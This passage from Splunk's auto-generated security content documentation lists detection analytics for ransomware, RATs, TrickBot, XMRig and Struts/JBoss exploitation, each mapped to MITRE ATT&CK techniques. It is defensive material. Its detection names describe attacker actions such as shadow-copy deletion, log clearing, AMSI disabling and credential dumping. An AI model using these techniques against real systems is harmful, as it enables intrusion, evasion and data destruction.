BCDEdit Failure Recovery Modification | T1490, T1485, T1482, T1021.001, T1486, T1059.003, T1053.005, T1562.001, T1489 | Inhibit System Recovery, Data Destruction, Domain Trust Discovery, Remote Desktop Protocol, Data Encrypted for Impact, Windows Command Shell, Scheduled Task, Disable or Modify Tools, Service Stop | Impact, Impact, Discovery, Lateral Movement, Impact, Execution, Execution, Persistence, Privilege Escalation, Defense Evasion, Impact | TTP
CMLUA Or CMSTPLUA UAC Bypass | T1218.003 | CMSTP | Defense Evasion | TTP
Clear Unallocated Sector Using Cipher App | T1070.004 | File Deletion | Defense Evasion | TTP
Common Ransomware Extensions | T1485 | Data Destruction | Impact | Hunting
Common Ransomware Notes | T1485 | Data Destruction | Impact | Hunting
Conti Common Exec parameter | T1204 | User Execution | Execution | TTP
Delete A Net User | T1489 | Service Stop | Impact | Anomaly
Delete ShadowCopy With PowerShell | T1490 | Inhibit System Recovery | Impact | TTP
Deleting Shadow Copies | T1490, T1070, T1070.001 | Inhibit System Recovery, Indicator Removal on Host, Clear Windows Event Logs | Impact, Defense Evasion, Defense Evasion | TTP
Detect RClone Command-Line Usage | T1020 | Automated Exfiltration | Exfiltration | TTP
Detect Renamed RClone | T1020 | Automated Exfiltration | Exfiltration | Hunting
Detect SharpHound Command-Line Arguments | T1087.002, T1087.001, T1482, T1069.002, T1069.001 | Domain Account, Local Account, Domain Trust Discovery, Domain Groups, Local Groups | Discovery, Discovery, Discovery, Discovery, Discovery | TTP
Detect SharpHound File Modifications | T1087.002, T1087.001, T1482, T1069.002, T1069.001 | Domain Account, Local Account, Domain Trust Discovery, Domain Groups, Local Groups | Discovery, Discovery, Discovery, Discovery, Discovery | TTP
Detect SharpHound Usage | T1087.002, T1087.001, T1482, T1069.002, T1069.001 | Domain Account, Local Account, Domain Trust Discovery, Domain Groups, Local Groups | Discovery, Discovery, Discovery, Discovery, Discovery | TTP
Disable AMSI Through Registry | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Disable ETW Through Registry | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Disable Logs Using WevtUtil | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
Disable Net User Account | T1489 | Service Stop | Impact | TTP
Disable Windows Behavior Monitoring | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Excessive Service Stop Attempt | T1489 | Service Stop | Impact | Anomaly
Excessive Usage Of Net App | T1531 | Account Access Removal | Impact | Anomaly
Excessive Usage Of SC Service Utility | T1569.002 | Service Execution | Execution | Anomaly
Execute Javascript With Jscript COM CLSID | T1059.005 | Visual Basic | Execution | TTP
Fsutil Zeroing File | T1070 | Indicator Removal on Host | Defense Evasion | TTP
ICACLS Grant Command | T1222 | File and Directory Permissions Modification | Defense Evasion | TTP
Known Services Killed by Ransomware | T1490 | Inhibit System Recovery | Impact | TTP
Modification Of Wallpaper | T1491 | Defacement | Impact | TTP
Msmpeng Application DLL Side Loading | T1574.002 | DLL Side-Loading | Persistence, Privilege Escalation, Defense Evasion | TTP
Permission Modification using Takeown App | T1222 | File and Directory Permissions Modification | Defense Evasion | TTP
Powershell Disable Security Monitoring | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Powershell Enable SMB1Protocol Feature | T1027.005 | Indicator Removal from Tools | Defense Evasion | TTP
Powershell Execute COM Object | T1546.015 | Component Object Model Hijacking | Privilege Escalation, Persistence | TTP
Prevent Automatic Repair Mode using Bcdedit | T1490 | Inhibit System Recovery | Impact | TTP
Prohibited Network Traffic Allowed | T1048 | Exfiltration Over Alternative Protocol | Exfiltration | TTP
Recon AVProduct Through Pwh or WMI | T1592 | Gather Victim Host Information | Reconnaissance | TTP
Recursive Delete of Directory In Batch CMD | T1070.004 | File Deletion | Defense Evasion | TTP
Registry Keys Used For Persistence | T1547.001 | Registry Run Keys / Startup Folder | Persistence, Privilege Escalation | TTP
Remote Process Instantiation via WMI | T1047 | Windows Management Instrumentation | Execution | TTP
Resize Shadowstorage Volume | T1489 | Service Stop | Impact | TTP
Revil Common Exec Parameter | T1204 | User Execution | Execution | TTP
Revil Registry Entry | T1112 | Modify Registry | Defense Evasion | TTP
SMB Traffic Spike | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | Anomaly
SMB Traffic Spike - MLTK | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | Anomaly
Schtasks used for forcing a reboot | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP
Spike in File Writes | | | | Anomaly
Start Up During Safe Mode Boot | T1547.001 | Registry Run Keys / Startup Folder | Persistence, Privilege Escalation | TTP
Suspicious Event Log Service Behavior | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
Suspicious Scheduled Task from Public Directory | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | Anomaly
Suspicious wevtutil Usage | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
System Processes Run From Unexpected Locations | T1036.003 | Rename System Utilities | Defense Evasion | TTP
TOR Traffic | T1071.001 | Web Protocols | Command And Control | TTP
UAC Bypass With Colorui COM Object | T1218.003 | CMSTP | Defense Evasion | TTP
USN Journal Deletion | T1070 | Indicator Removal on Host | Defense Evasion | TTP
Uninstall App Using MsiExec | T1218.007 | Msiexec | Defense Evasion | TTP
Unusually Long Command Line | | | | Anomaly
Unusually Long Command Line - MLTK | | | | Anomaly
WBAdmin Delete System Backups | T1490 | Inhibit System Recovery | Impact | TTP
Wbemprox COM Object Execution | T1218.003 | CMSTP | Defense Evasion | TTP
WevtUtil Usage To Clear Logs | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
Wevtutil Usage To Disable Logs | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
WinEvent Scheduled Task Created Within Public Path | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP
WinEvent Scheduled Task Created to Spawn Shell | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP
Windows Event Log Cleared | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Delivery
  • Exfiltration
  • Exploitation
  • Privilege Escalation
  • Reconnaissance


Reference


version: 1


Ransomware cloud

Leverage searches that allow you to detect and investigate unusual activities that might relate to ransomware. These searches cover cloud-related objects that may be targeted by malicious actors via the cloud providers' own encryption features.

  • Product: Splunk Security Analytics for AWS, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2020-10-27
  • Use Case: Advanced Threat Detection

Remcos

Leverage searches that allow you to detect and investigate unusual activities that might relate to the Remcos RAT, including looking for file writes associated with its payload, screen capture, registry modification, UAC bypass, persistence and data collection.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-09-23
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Disabling Remote User Account Control | T1548.002, T1036, T1547.010, T1070, T1547.001, T1546.012, T1546.011, T1113, T1543 | Bypass User Account Control, Masquerading, Port Monitors, Indicator Removal on Host, Registry Run Keys / Startup Folder, Image File Execution Options Injection, Application Shimming, Screen Capture, Create or Modify System Process | Privilege Escalation, Defense Evasion, Defense Evasion, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Collection, Persistence, Privilege Escalation | TTP
Executables Or Script Creation In Suspicious Path | T1036 | Masquerading | Defense Evasion | TTP
Process Deleting Its Process File Path | T1070 | Indicator Removal on Host | Defense Evasion | TTP
Registry Keys Used For Persistence | T1547.001 | Registry Run Keys / Startup Folder | Persistence, Privilege Escalation | TTP
Remcos RAT File Creation in Remcos Folder | T1113 | Screen Capture | Collection | TTP
Suspicious Image Creation In Appdata Folder | T1113 | Screen Capture | Collection | TTP
Suspicious Process File Path | T1543 | Create or Modify System Process | Persistence, Privilege Escalation | TTP
Suspicious WAV file in Appdata Folder | T1113 | Screen Capture | Collection | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Revil ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the Revil ransomware, including looking for file writes associated with Revil, encryption of network shares, deletion of shadow volume storage, registry key modification, deletion of security logs, and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • Last Updated: 2021-06-04
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Allow Network Discovery In Firewall | T1562.007, T1490, T1562.001, T1491, T1574.002, T1204, T1112, T1218.003 | Disable or Modify Cloud Firewall, Inhibit System Recovery, Disable or Modify Tools, Defacement, DLL Side-Loading, User Execution, Modify Registry, CMSTP | Defense Evasion, Impact, Defense Evasion, Impact, Persistence, Privilege Escalation, Defense Evasion, Execution, Defense Evasion, Defense Evasion | TTP
Delete ShadowCopy With PowerShell | T1490 | Inhibit System Recovery | Impact | TTP
Disable Windows Behavior Monitoring | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Modification Of Wallpaper | T1491 | Defacement | Impact | TTP
Msmpeng Application DLL Side Loading | T1574.002 | DLL Side-Loading | Persistence, Privilege Escalation, Defense Evasion | TTP
Powershell Disable Security Monitoring | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Revil Common Exec Parameter | T1204 | User Execution | Execution | TTP
Revil Registry Entry | T1112 | Modify Registry | Defense Evasion | TTP
Wbemprox COM Object Execution | T1218.003 | CMSTP | Defense Evasion | TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Ryuk ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the Ryuk ransomware, including looking for file writes associated with Ryuk, stopping of the Security Account Manager, DisableAntiSpyware registry key modification, suspicious psexec use, and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic
  • Last Updated: 2020-11-06
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
BCDEdit Failure Recovery Modification | T1490, T1485, T1482, T1021.001, T1486, T1059.003, T1053.005, T1562.001, T1489 | Inhibit System Recovery, Data Destruction, Domain Trust Discovery, Remote Desktop Protocol, Data Encrypted for Impact, Windows Command Shell, Scheduled Task, Disable or Modify Tools, Service Stop | Impact, Impact, Discovery, Lateral Movement, Impact, Execution, Execution, Persistence, Privilege Escalation, Defense Evasion, Impact | TTP
Common Ransomware Extensions | T1485 | Data Destruction | Impact | Hunting
Common Ransomware Notes | T1485 | Data Destruction | Impact | Hunting
NLTest Domain Trust Discovery | T1482 | Domain Trust Discovery | Discovery | TTP
Remote Desktop Network Bruteforce | T1021.001 | Remote Desktop Protocol | Lateral Movement | TTP
Remote Desktop Network Traffic | T1021.001 | Remote Desktop Protocol | Lateral Movement | Anomaly
Ryuk Test Files Detected | T1486 | Data Encrypted for Impact | Impact | TTP
Ryuk Wake on LAN Command | T1059.003 | Windows Command Shell | Execution | TTP
Spike in File Writes | | | | Anomaly
Suspicious Scheduled Task from Public Directory | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | Anomaly
WBAdmin Delete System Backups | T1490 | Inhibit System Recovery | Impact | TTP
WinEvent Scheduled Task Created Within Public Path | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP
WinEvent Scheduled Task Created to Spawn Shell | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP
Windows DisableAntiSpyware Registry | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Windows Security Account Manager Stopped | T1489 | Service Stop | Impact | TTP

Kill Chain Phase

  • Actions on Objectives
  • Delivery
  • Exploitation
  • Lateral Movement
  • Privilege Escalation
  • Reconnaissance


Reference


version: 1


Samsam ransomware

Leverage searches that allow you to detect and investigate unusual activities that might relate to the SamSam ransomware, including looking for file writes associated with SamSam, RDP brute force attacks, the presence of files with SamSam ransomware extensions, suspicious psexec use, and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint, Network_Traffic, Web
  • Last Updated: 2018-12-13
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Attacker Tools On Endpoint | T1036.005, T1595, T1003, T1489, T1204.002, T1485, T1531, T1490, T1222, T1021.002, T1569.002, T1082, T1016, T1562.001, T1105, T1087, T1036, T1059, T1117, T1202, T1053, T1203, T1072, T1021.001, T1218.011, T1486, T1543.003, T1543, T1036.003, T1190 | Match Legitimate Name or Location, Active Scanning, OS Credential Dumping, Service Stop, Malicious File, Data Destruction, Account Access Removal, Inhibit System Recovery, File and Directory Permissions Modification, SMB/Windows Admin Shares, Service Execution, System Information Discovery, System Network Configuration Discovery, Disable or Modify Tools, Ingress Tool Transfer, Account Discovery, Masquerading, Command and Scripting Interpreter, Regsvr32, Indirect Command Execution, Scheduled Task/Job, Exploitation for Client Execution, Software Deployment Tools, Remote Desktop Protocol, Rundll32, Data Encrypted for Impact, Windows Service, Create or Modify System Process, Rename System Utilities, Exploit Public-Facing Application | Defense Evasion, Reconnaissance, Credential Access, Impact, Execution, Impact, Impact, Impact, Defense Evasion, Lateral Movement, Execution, Discovery, Discovery, Defense Evasion, Command And Control, Discovery, Defense Evasion, Execution, , Defense Evasion, Execution, Persistence, Privilege Escalation, Execution, Execution, Lateral Movement, Lateral Movement, Defense Evasion, Impact, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion, Initial Access | TTP
Batch File Write to System32 | T1204.002 | Malicious File | Execution | TTP
Common Ransomware Extensions | T1485 | Data Destruction | Impact | Hunting
Common Ransomware Notes | T1485 | Data Destruction | Impact | Hunting
Deleting Shadow Copies | T1490, T1070, T1070.001 | Inhibit System Recovery, Indicator Removal on Host, Clear Windows Event Logs | Impact, Defense Evasion, Defense Evasion | TTP
Detect PsExec With accepteula Flag | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | TTP
Detect Renamed PSExec | T1569.002 | Service Execution | Execution | Hunting
Detect attackers scanning for vulnerable JBoss servers | T1082 | System Information Discovery | Discovery | TTP
Detect malicious requests to exploit JBoss servers | | | | TTP
File with Samsam Extension | | | | TTP
Remote Desktop Network Bruteforce | T1021.001 | Remote Desktop Protocol | Lateral Movement | TTP
Remote Desktop Network Traffic | T1021.001 | Remote Desktop Protocol | Lateral Movement | Anomaly
Samsam Test File Write | T1486 | Data Encrypted for Impact | Impact | TTP
Spike in File Writes | | | | Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Delivery
  • Execution
  • Exploitation
  • Installation
  • Lateral Movement
  • Reconnaissance


Reference


version: 1


Trickbot

Leverage searches that allow you to detect and investigate unusual activities that might relate to the TrickBot banking trojan, including file writes associated with its payload, process injection, shellcode execution, and data collection, including in LDAP environments.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-04-20
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Account Discovery With Net App | T1087.002, T1562.001, T1059, T1055, T1204.002, T1548.002, T1112, T1560.001, T1218.005, T1482, T1566.001, T1547.001, T1218.011, T1053, T1005, T1218.010, T1590.005, T1027, T1053.005, T1021.002 | Domain Account, Disable or Modify Tools, Command and Scripting Interpreter, Process Injection, Malicious File, Bypass User Account Control, Modify Registry, Archive via Utility, Mshta, Domain Trust Discovery, Spearphishing Attachment, Registry Run Keys / Startup Folder, Rundll32, Scheduled Task/Job, Data from Local System, Regsvr32, IP Addresses, Obfuscated Files or Information, Scheduled Task, SMB/Windows Admin Shares | Discovery, Defense Evasion, Execution, Defense Evasion, Privilege Escalation, Execution, Privilege Escalation, Defense Evasion, Defense Evasion, Collection, Defense Evasion, Discovery, Initial Access, Persistence, Privilege Escalation, Defense Evasion, Execution, Persistence, Privilege Escalation, Collection, Defense Evasion, Reconnaissance, Defense Evasion, Execution, Persistence, Privilege Escalation, Lateral Movement | TTP
Attempt To Stop Security Service | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Cobalt Strike Named Pipes | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Mshta spawning Rundll32 OR Regsvr32 Process | T1218.005 | Mshta | Defense Evasion | TTP
Office Application Spawn rundll32 process | T1566.001 | Spearphishing Attachment | Initial Access | TTP
Office Document Executing Macro Code | T1566.001 | Spearphishing Attachment | Initial Access | TTP
Office Product Spawn CMD Process | T1218.005 | Mshta | Defense Evasion | TTP
Powershell Remote Thread To Known Windows Process | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Schedule Task with Rundll32 Command Trigger | T1053 | Scheduled Task/Job | Execution, Persistence, Privilege Escalation | TTP
Suspicious Rundll32 StartW | T1218.011 | Rundll32 | Defense Evasion | TTP
Trickbot Named Pipe | T1055 | Process Injection | Defense Evasion, Privilege Escalation | TTP
Wermgr Process Connecting To IP Check Web Services | T1590.005 | IP Addresses | Reconnaissance | TTP
Wermgr Process Create Executable File | T1027 | Obfuscated Files or Information | Defense Evasion | TTP
Wermgr Process Spawned CMD Or Powershell Process | T1059 | Command and Scripting Interpreter | Execution | TTP
Write Executable in SMB Share | T1021.002 | SMB/Windows Admin Shares | Lateral Movement | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Installation
  • Lateral Movement
  • Reconnaissance


Reference


version: 1


Unusual processes

Quickly identify systems running new or unusual processes in your environment that could be indicators of suspicious activity. Processes run from unusual locations, those with conspicuously long command lines, and rare executables are all examples of activities that may warrant deeper investigation.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Attacker Tools On Endpoint | T1036.005, T1595, T1003, T1489, T1204.002, T1485, T1531, T1490, T1222, T1021.002, T1569.002, T1082, T1016, T1562.001, T1105, T1087, T1036, T1059, T1117, T1202, T1053, T1203, T1072, T1021.001, T1218.011, T1486, T1543.003, T1543, T1036.003, T1190 | Match Legitimate Name or Location, Active Scanning, OS Credential Dumping, Service Stop, Malicious File, Data Destruction, Account Access Removal, Inhibit System Recovery, File and Directory Permissions Modification, SMB/Windows Admin Shares, Service Execution, System Information Discovery, System Network Configuration Discovery, Disable or Modify Tools, Ingress Tool Transfer, Account Discovery, Masquerading, Command and Scripting Interpreter, Regsvr32, Indirect Command Execution, Scheduled Task/Job, Exploitation for Client Execution, Software Deployment Tools, Remote Desktop Protocol, Rundll32, Data Encrypted for Impact, Windows Service, Create or Modify System Process, Rename System Utilities, Exploit Public-Facing Application | Defense Evasion, Reconnaissance, Credential Access, Impact, Execution, Impact, Impact, Impact, Defense Evasion, Lateral Movement, Execution, Discovery, Discovery, Defense Evasion, Command And Control, Discovery, Defense Evasion, Execution, , Defense Evasion, Execution, Persistence, Privilege Escalation, Execution, Execution, Lateral Movement, Lateral Movement, Defense Evasion, Impact, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion, Initial Access | TTP
Credential Extraction indicative of FGDump and CacheDump with s option | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction indicative of FGDump and CacheDump with v option | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction indicative of use of Mimikatz modules | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction native Microsoft debuggers peek into the kernel | T1003 | OS Credential Dumping | Credential Access | TTP
Credential Extraction native Microsoft debuggers via z command line option | T1003 | OS Credential Dumping | Credential Access | TTP
Detect Rare Executables | | | | Anomaly
Detect processes used for System Network Configuration Discovery | T1016 | System Network Configuration Discovery | Discovery | TTP
First time seen command line argument | T1059, T1117, T1202 | Command and Scripting Interpreter, Regsvr32, Indirect Command Execution | Execution, , Defense Evasion | Anomaly
More than usual number of LOLBAS applications in short time period | T1059, T1053 | Command and Scripting Interpreter, Scheduled Task/Job | Execution, Execution, Persistence, Privilege Escalation | Anomaly
Rare Parent-Child Process Relationship | T1203, T1059, T1053, T1072 | Exploitation for Client Execution, Command and Scripting Interpreter, Scheduled Task/Job, Software Deployment Tools | Execution, Execution, Execution, Persistence, Privilege Escalation, Execution, Lateral Movement | Anomaly
RunDLL Loading DLL By Ordinal | T1218.011 | Rundll32 | Defense Evasion | TTP
System Processes Run From Unexpected Locations | T1036.003 | Rename System Utilities | Defense Evasion | TTP
Unusually Long Command Line | | | | Anomaly
Unusually Long Command Line - MLTK | | | | Anomaly
WinRM Spawning a Process | T1190 | Exploit Public-Facing Application | Initial Access | TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Denial of Service
  • Exploitation
  • Installation
  • Privilege Escalation


Reference


version: 2


Windows file extension and association abuse

Detect and investigate suspected abuse of file extensions and Windows file associations. Some of the malicious behaviors involved may include inserting spaces before file extensions or prepending the file extension with a different one, among other techniques.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-01-26
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Execution of File with Multiple Extensions | T1036.003, T1127.001, T1218.011, T1127, T1036 | Rename System Utilities, MSBuild, Rundll32, Trusted Developer Utilities Proxy Execution, Masquerading | Defense Evasion, Defense Evasion, Defense Evasion, Defense Evasion, Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Windows service abuse

Windows services are often used by attackers for persistence and the ability to load drivers or otherwise interact with the Windows kernel. This Analytic Story helps you monitor your environment for indications that Windows services are being modified or created in a suspicious manner.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2017-11-02
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
First Time Seen Running Windows Service | T1569.002, T1055, T1106, T1569, T1574.011, T1543.003 | Service Execution, Process Injection, Native API, System Services, Services Registry Permissions Weakness, Windows Service | Execution, Defense Evasion, Privilege Escalation, Execution, Execution, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation | Anomaly
Illegal Service and Process Control via Mimikatz modules | T1055, T1106, T1569 | Process Injection, Native API, System Services | Defense Evasion, Privilege Escalation, Execution, Execution | TTP
Illegal Service and Process Control via PowerSploit modules | T1055, T1106, T1569 | Process Injection, Native API, System Services | Defense Evasion, Privilege Escalation, Execution, Execution | TTP
Reg exe Manipulating Windows Services Registry Keys | T1574.011 | Services Registry Permissions Weakness | Persistence, Privilege Escalation, Defense Evasion | TTP
Sc exe Manipulating Windows Services | T1543.003 | Windows Service | Persistence, Privilege Escalation | TTP

Kill Chain Phase

  • Actions on Objectives
  • Installation


Reference


version: 3


Xmrig

Leverage searches that allow you to detect and investigate unusual activities that might relate to the XMRig Monero coin miner, including file writes associated with its payload, process command lines, defense evasion (killing services, deleting users, modifying file or folder permissions, killing other malware or other coin miners), and hacking tools, including Telegram used as a means of command and control (C2) to download other files. Adversaries may leverage the resources of co-opted systems to solve resource-intensive problems, which may impact system and/or hosted service availability. One common purpose of Resource Hijacking is to validate transactions on cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to degrade performance or cause affected machines to become unresponsive. (1) Servers and cloud-based (2) systems are common targets because of their high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-05-07
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Attacker Tools On Endpoint | T1036.005, T1595, T1003, T1489, T1204.002, T1485, T1531, T1490, T1222, T1021.002, T1569.002, T1082, T1016, T1562.001, T1105, T1087, T1036, T1059, T1117, T1202, T1053, T1203, T1072, T1021.001, T1218.011, T1486, T1543.003, T1543, T1036.003, T1190 | Match Legitimate Name or Location, Active Scanning, OS Credential Dumping, Service Stop, Malicious File, Data Destruction, Account Access Removal, Inhibit System Recovery, File and Directory Permissions Modification, SMB/Windows Admin Shares, Service Execution, System Information Discovery, System Network Configuration Discovery, Disable or Modify Tools, Ingress Tool Transfer, Account Discovery, Masquerading, Command and Scripting Interpreter, Regsvr32, Indirect Command Execution, Scheduled Task/Job, Exploitation for Client Execution, Software Deployment Tools, Remote Desktop Protocol, Rundll32, Data Encrypted for Impact, Windows Service, Create or Modify System Process, Rename System Utilities, Exploit Public-Facing Application | Defense Evasion, Reconnaissance, Credential Access, Impact, Execution, Impact, Impact, Impact, Defense Evasion, Lateral Movement, Execution, Discovery, Discovery, Defense Evasion, Command And Control, Discovery, Defense Evasion, Execution, , Defense Evasion, Execution, Persistence, Privilege Escalation, Execution, Execution, Lateral Movement, Lateral Movement, Defense Evasion, Impact, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion, Initial Access | TTP
Attempt To Disable Services | T1489 | Service Stop | Impact | TTP
Attempt To delete Services | T1489 | Service Stop | Impact | TTP
Delete A Net User | T1489 | Service Stop | Impact | Anomaly
Deleting Of Net Users | T1531 | Account Access Removal | Impact | TTP
Deny Permission using Cacls Utility | T1222 | File and Directory Permissions Modification | Defense Evasion | TTP
Disable Net User Account | T1489 | Service Stop | Impact | TTP
Disable Windows App Hotkeys | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Disabling Net User Account | T1531 | Account Access Removal | Impact | TTP
Download Files Using Telegram | T1105 | Ingress Tool Transfer | Command And Control | TTP
Enumerate Users Local Group Using Telegram | T1087 | Account Discovery | Discovery | TTP
Excessive Attempt To Disable Services | T1489 | Service Stop | Impact | Anomaly
Excessive Service Stop Attempt | T1489 | Service Stop | Impact | Anomaly
Excessive Usage Of Cacls App | T1222 | File and Directory Permissions Modification | Defense Evasion | Anomaly
Excessive Usage Of Net App | T1531 | Account Access Removal | Impact | Anomaly
Excessive Usage Of Taskkill | T1562.001 | Disable or Modify Tools | Defense Evasion | Anomaly
Executables Or Script Creation In Suspicious Path | T1036 | Masquerading | Defense Evasion | TTP
Grant Permission Using Cacls Utility | T1222 | File and Directory Permissions Modification | Defense Evasion | TTP
Hide User Account From Sign-In Screen | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
ICACLS Grant Command | T1222 | File and Directory Permissions Modification | Defense Evasion | TTP
Icacls Deny Command | T1222 | File and Directory Permissions Modification | Defense Evasion | TTP
Modify ACL permission To Files Or Folder | T1222 | File and Directory Permissions Modification | Defense Evasion | TTP
Modify ACLs Permission Of Files Or Folders | T1222 | File and Directory Permissions Modification | Defense Evasion | Anomaly
Process Kill Base On File Path | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Schtasks Run Task On Demand | T1053 | Scheduled Task/Job | Execution, Persistence, Privilege Escalation | TTP
Suspicious Driver Loaded Path | T1543.003 | Windows Service | Persistence, Privilege Escalation | TTP
Suspicious Process File Path | T1543 | Create or Modify System Process | Persistence, Privilege Escalation | TTP
XMRIG Driver Loaded | T1543.003 | Windows Service | Persistence, Privilege Escalation | TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Exploitation
  • Installation


Reference


version: 1



Vulnerability

Apache struts vulnerability

Detect and investigate activities--such as unusually long `Content-Type` header lengths, suspicious Java classes, and web servers executing suspicious processes--consistent with attempts to exploit Apache Struts vulnerabilities.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-12-06
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Suspicious Java Classes | | | | Anomaly
Unusually Long Content-Type Length | | | | Anomaly
Web Servers Executing Suspicious Processes | T1082 | System Information Discovery | Discovery | TTP

Kill Chain Phase

  • Actions on Objectives
  • Delivery
  • Exploitation


Reference


version: 1


Jboss vulnerability

In March of 2016, adversaries were seen using JexBoss--an open-source utility used for testing and exploiting JBoss application servers. These searches help detect evidence of these attacks, such as network connections to external resources or web services spawning atypical child processes, among others.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Web
  • Last Updated: 2017-09-14
  • Use Case: Advanced Threat Detection

Detection Profile

name | ID | Technique | Tactic | Type
Detect attackers scanning for vulnerable JBoss servers | T1082 | System Information Discovery | Discovery | TTP
Detect malicious requests to exploit JBoss servers | | | | TTP

Kill Chain Phase

  • Delivery
  • Reconnaissance


Reference


version: 1




#############
# Automatically generated by doc_gen.py in https://github.com/splunk/security_content
# On Date: 2021-09-27 18:37:39.621200 UTC
# Author: Splunk Security Research
# Contact: research@splunk.com
#############
Last modified on 28 September, 2021

This documentation applies to the following versions of Splunk® Security Content: 3.29.0
